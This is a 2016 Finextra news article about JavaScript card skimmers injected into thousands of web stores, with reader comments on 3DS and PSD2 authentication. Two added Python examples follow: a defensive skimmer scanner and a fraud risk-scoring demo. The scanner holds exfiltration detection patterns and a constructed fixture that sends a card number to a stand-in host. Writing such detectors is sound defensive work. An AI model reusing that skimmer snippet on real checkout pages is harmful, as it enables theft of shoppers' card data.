11 December 2017

Hackers hit 6000 web stores to steal card data

14 October 2016  |  10551 views  |  10 comments  |  Computer virus

Crooks have injected malicious code into 5925 online stores, enabling them to steal payment card details, according to a Dutch developer.

Willem De Groot says that hackers have been gaining access to the stores' source code through unpatched software flaws and installing JavaScript wiretaps to steal card data. The information makes its way to an off-shore collection server - usually in Russia, says De Groot - before being put up for sale on the dark web for around $30 a card.

De Groot scanned a batch of 255,000 online stores last November, when he first heard about the scam. At the time he found 3501 compromised sites, but by this September the number of victims had risen to 5925 and included Audi, pop star Bjork and Washington Cathedral.
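The check below is an added example, not code from the article or from De Groot's scanner. It shows the defender's side of the injection the article describes: a small Python scanner that parses a checkout page's HTML and flags two signals a JavaScript wiretap leaves behind, a script tag loaded from a host outside the shop's allowlist, and an inline script that both reads payment-form fields and has a way to send data to an unlisted host. The allowlist (`shop.example`, `cdn.shop.example`, `js.payment-provider.example`), the token patterns and both sample pages are constructed for the demonstration.

```python
"""
Added example (not code from the Finextra article, nor Willem de Groot's
scanner): a defender-side check for the kind of injected "JavaScript wiretap"
the article describes. It parses a checkout page's HTML and flags two signals:
script tags loaded from hosts outside the shop's allowlist, and inline scripts
that both read payment-form fields and send data to an off-site host.
The allowlist and the two sample pages are constructed for this demonstration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the shop legitimately loads scripts from (assumed for this example).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example", "js.payment-provider.example"}

# Identifiers a script would touch when reading card data from the form.
CARD_FIELD_TOKENS = re.compile(r"card[_-]?number|cc[_-]?num|cvv|cvc|expir", re.I)
# Ways a script can push data off-page (XHR, fetch, beacon, image/script src).
EXFIL_TOKENS = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def script_host(src, page_host):
    """Host a script URL resolves to; relative URLs come from the page's own host."""
    return urlparse(src).hostname or page_host


def scan_checkout_page(html, page_host):
    """Return a list of (finding, host) pairs; an empty list means nothing flagged."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = script_host(src, page_host)
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("unlisted-script-host", host))
    for body in collector.inline:
        reads_card = bool(CARD_FIELD_TOKENS.search(body))
        can_send = bool(EXFIL_TOKENS.search(body))
        dests = {urlparse(u).hostname for u in URL_RE.findall(body)}
        dests = {d for d in dests if d and d not in ALLOWED_SCRIPT_HOSTS}
        if reads_card and (can_send or dests):
            findings.append(("inline-card-exfil", ",".join(sorted(dests)) or "no-url"))
    return findings


# Constructed sample: a clean checkout page...
CLEAN_PAGE = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://js.payment-provider.example/v1.js"></script>
<script>window.shopConfig = {currency: "USD"};</script>
</head><body><form id="pay"><input name="cc_number"><input name="cvv"></form></body></html>"""

# ...and the same page with an injected third-party script and an inline
# handler that copies the card field to an unlisted host (constructed fixture).
INJECTED = """<script src="https://cdn-stats.example/jquery.min.js"></script>
<script>
document.getElementById('pay').addEventListener('submit', function () {
  var n = document.querySelector('[name=cc_number]').value;
  new Image().src = 'https://cdn-stats.example/i.gif?d=' + encodeURIComponent(n);
});
</script>
"""
COMPROMISED_PAGE = CLEAN_PAGE.replace("</body>", INJECTED + "</body>")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("compromised", COMPROMISED_PAGE)):
        print(name, scan_checkout_page(page, "shop.example"))
```

In practice this kind of scan is run against a saved baseline of the checkout page so that any new script host or inline block stands out, and it is paired with a Content-Security-Policy that limits `script-src` and `connect-src` to the same allowlist, which blocks the exfiltration even when the injection itself is missed.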

Separately, fashion retailer Vera Bradley says that it has been told by law enforcement about a data breach that puts customer card details at risk. Cards used at the firm's shops between the end of July and end of September may have been affected.

Crooks appear to have accessed Vera Bradley's payment processing system and installed a program designed to harvest card numbers, cardholder names, expiration dates and internal verification codes from the cards' magnetic stripe data.

Comments: (10)

A Finextra member | 14 October, 2016, 14:08

Merchants protected by 3DSecure or its big data successors will not be too worried - merchants who are not embracing 3DS should be concerned.

Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune | 14 October, 2016, 16:35

Merchants protected by 3DS will have bigger worries - like how to pay their bills.

Mitigating Fraud Does Not Pay The Bills

A Finextra member | 16 October, 2016, 08:17

Oddly all the merchants in the U.K. that use 3DS pay their bills. UK consumers still buy online with confidence. The UK is one of the world's most advanced ecommerce markets, has very low fraud rates and low interchange too. By using 3DS and AVS they also stop fraudsters from paying their bills or subsidising other illegal activity. You seem to have a major downer on any effective counter-fraud solution, POS or ecommerce. Why is that?
Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune | 16 October, 2016, 11:00

Come out of anonymity if you expect me to answer personal questions.

Jan-Olof Brunila - Swedbank - Stockholm | 17 October, 2016, 09:58

E-comm crooks now need to make their last push in the EU, and anybody active in ecommerce needs to prepare for the new rules. In 2018 the updated payment services directive including the strong customer authentication mandate (PSD2 + SCA) will demand a super-3DS with strong two-factor authentication of both the payer consent and the amount. If not in place, payer account service providers (card issuers and others) must decline transaction attempts, also from e-comm merchants outside the EU if the payer has an EU area payment account... Furthermore there will be penalties for any business that is negligent with personal data security - and a card number is personal data. E-commerce is becoming mainstream.

David Abbott - Nourpay - Riyadh | 17 October, 2016, 10:17

Hi Jan-Olof, it's interesting that in the UK (and possibly elsewhere) CA/Arcot's issuer-side 3DSecure solution is using 'big data' to completely waive the 3DS password challenge and reply process...

The decisioning (Authorise - Challenge - Decline) is based on historic consumer behaviour and the intelligent assessment of threat. I am not here to sell CA services, but as a consumer of them, via my bank (First Direct/HSBC), I am a huge fan; these transactions are frictionless but authenticated to a very high level of confidence for myself and the merchant.

Jan-Olof Brunila - Swedbank - Stockholm | 17 October, 2016, 10:37

Dear David, the EBA's circulated regulatory tech standards doc for strong customer authentication specifically comments that risk-based authentication is not allowed when the SCA-RTS go live in 2018. So from the go-live date there is legislation that backs up the demand for strong two-factor or biometric authentication (with a free zone for e-comm payments of less than 10 Euro)! If we believe that the EU authorities are going to realise this legislation according to plan, we now need to start figuring out how we implement it in a user-friendly way.


Ketharaman Swaminathan - GTM360 Marketing Solutions - Pune | 17 October, 2016, 18:32

It would be interesting to see the impact of SCA-RTS on recurring payments. The Indian banking regulator mandated "explicit 2FA" via 3DS for all online card payments a few years ago. Apart from increasing friction and reducing conversion for one-off online card payments, the mandate virtually killed companies whose business model relies on monthly subscriptions (e.g. SaaS, media) - you can imagine the friction involved in individually having to two-factor authenticate 12 payments a year for each subscription service a customer has signed up for. Many subscription-based companies shifted their domicile overseas so that they can use ePGs that don't insist on 2FA; many customers - like me - opted for overseas service providers just to escape the onerous 2FA payments every month. A month ago, the regulator announced an exemption from 2FA: now only the first of the 12 months' payments is subject to 2FA. The remaining 11 monthly payments can happen without 2FA. The subscription industry has heaved a sigh of relief. I wonder how the EU subscription industry will react to SCA-RTS.

Hitesh Thakkar - FIS Payments Software and Services India - India | 17 October, 2016, 18:42

Fraud prevention and risk management have become really costly and a matter of business case to monetise. Refer to the recent PCI DSS compliance impact in the UK.

https://www.finextra.com/newsarticle/29598/new-eu-rules-could-cost-uk-firms-122bn-in-cybersecurity-fines---pci-ssc?utm_medium=newsflash&utm_source=2016-10-17
A Finextra member | 18 October, 2016, 09:09

It is true; the EBA are discussing the future of risk-based authentication "as we know it". That, however, does not mean the end for risk-based authentication. The technology we refer to as risk-based authentication is a sophisticated approach to trusted devices and shopping behaviour, which will be needed more than ever in the constant battle to secure payments. Already fraudsters are harvesting victims' fingerprints and finding inventive ways to hack selfie technology. The EBA's guidelines are pretty simple; they require a two-factor approach to authenticating online transactions, something:

1. You have
2. You are
3. You know

The device is something you have; risk-based can intelligently confirm the device is trusted and behaving in a way that is indicative of a consumer's normal behaviour, and more importantly spot fraudulent patterns and anomalies. Recently a fraud attempt was made on my credit card; the bank was able to detect the transactions as fraudulent, even though the amounts were below £10, by seeing an untrusted device in a strange location. I don't use the card very often, so two transactions in quick succession set off an alert. Risk-based authentication takes care of the first factor, verifying the cardholder is in possession of the device.

Let's look at the second factor:

Fingerprint - something you are
Dynamic knowledge questions - something you know
Selfies - something you are
One-time pin - something you know
Dynamic CVV - something you know
App based push notification - something you know

The truth is risk-based will just change its purpose; today it has been implemented to reduce inconvenience to cardholders, reducing the frequency with which they have to enter their password, and let's be honest, passwords have been a real pain, causing unacceptable levels of abandonment through forgotten credentials. 100% challenge, however, if the challenge is a fingerprint or something else that is easy, is not such a big deal, or asking someone to click yes or no to "are you in Starbucks." We can all agree it is much less painful than a blocked card and a call to the fraud department to unblock it. But to avoid serious authentication overkill, risk-based allows one of the two factors to be invisible.

All that said, the EBA guidelines are not final. Many banks are lobbying against the idea of 100% challenge. Either way, an intelligent machine-learning approach to anomaly detection and device trust will not be going away.

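The decisioning that two of the comments above describe, the issuer's Authorise / Challenge / Decline outcome driven by device trust and behaviour, and the anecdote of two sub-£10 transactions from an untrusted device in a strange location being caught, can be made concrete with a small scoring engine. The Python below is an added example, not code from any commenter, bank or vendor product: the `Txn` record, the weights (40 for an untrusted device, 25 for an unusual country, 20 per earlier attempt within ten minutes), the thresholds (challenge at 25, decline at 80) and the transaction history are all constructed for the demonstration. The amount is deliberately not used as an exemption, which is why the small attempts in the scenario are still caught.

```python
"""
Added example, not the commenter's code nor any vendor's product: a minimal
risk-based authentication decision of the Authorise / Challenge / Decline kind
discussed in this thread. It scores an incoming card transaction using the
signals the comment above names: whether the device is trusted, whether the
country is outside the cardholder's usual set, and whether several attempts
arrive in quick succession. Thresholds, weights and the transaction history
are constructed for this demonstration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Txn:
    when: datetime
    amount: float
    device_id: str
    country: str
    approved: bool = True  # challenged/declined attempts still count for velocity


def risk_score(txn, history, trusted_devices, window=timedelta(minutes=10)):
    """Return (score, reasons); higher means more suspicious. Weights are assumed."""
    score, reasons = 0, []
    if txn.device_id not in trusted_devices:
        score += 40
        reasons.append("untrusted device")
    # Only approved history defines where the cardholder "usually" is, so a
    # blocked attempt from abroad does not quietly widen the usual set.
    usual_countries = {t.country for t in history if t.approved}
    if usual_countries and txn.country not in usual_countries:
        score += 25
        reasons.append("country outside cardholder's usual set")
    # Velocity: every earlier attempt inside the window adds to the score.
    burst = [t for t in history if timedelta(0) <= txn.when - t.when <= window]
    if burst:
        score += 20 * len(burst)
        reasons.append(f"{len(burst)} earlier attempt(s) within {window}")
    return score, reasons


def decide(txn, history, trusted_devices):
    """Map a score to the issuer's three outcomes (thresholds assumed)."""
    score, reasons = risk_score(txn, history, trusted_devices)
    if score >= 80:
        return "decline", score, reasons
    if score >= 25:
        return "challenge", score, reasons   # step-up: ask for a second factor
    return "authorise", score, reasons       # frictionless


def run_scenario():
    """Constructed scenario mirroring the comment: a rarely used card, a routine
    purchase, then two small attempts from an untrusted device in another country
    three minutes apart. Returns the three decisions in order."""
    trusted = {"phone-1"}
    t0 = datetime(2016, 10, 1, 12, 0)
    history = [
        Txn(t0 - timedelta(days=60), 42.00, "phone-1", "GB"),
        Txn(t0 - timedelta(days=25), 18.50, "phone-1", "GB"),
    ]
    outcomes = []

    routine = Txn(t0, 12.00, "phone-1", "GB")
    outcomes.append(decide(routine, history, trusted)[0])
    history.append(routine)

    first = Txn(t0 + timedelta(hours=5), 7.99, "web-77", "RO")
    outcomes.append(decide(first, history, trusted)[0])
    history.append(Txn(first.when, first.amount, first.device_id,
                       first.country, approved=False))

    second = Txn(first.when + timedelta(minutes=3), 9.50, "web-77", "RO")
    outcomes.append(decide(second, history, trusted)[0])
    return outcomes


if __name__ == "__main__":
    print(run_scenario())   # ['authorise', 'challenge', 'decline']
```

The first foreign attempt scores 65 and is challenged rather than declined, so a genuine cardholder on a new device abroad can still complete the purchase by passing the second factor; the second attempt three minutes later picks up the velocity weight and crosses the decline threshold. A real engine would add many more signals and tune the weights from labelled fraud data, but the shape of the decision is the same.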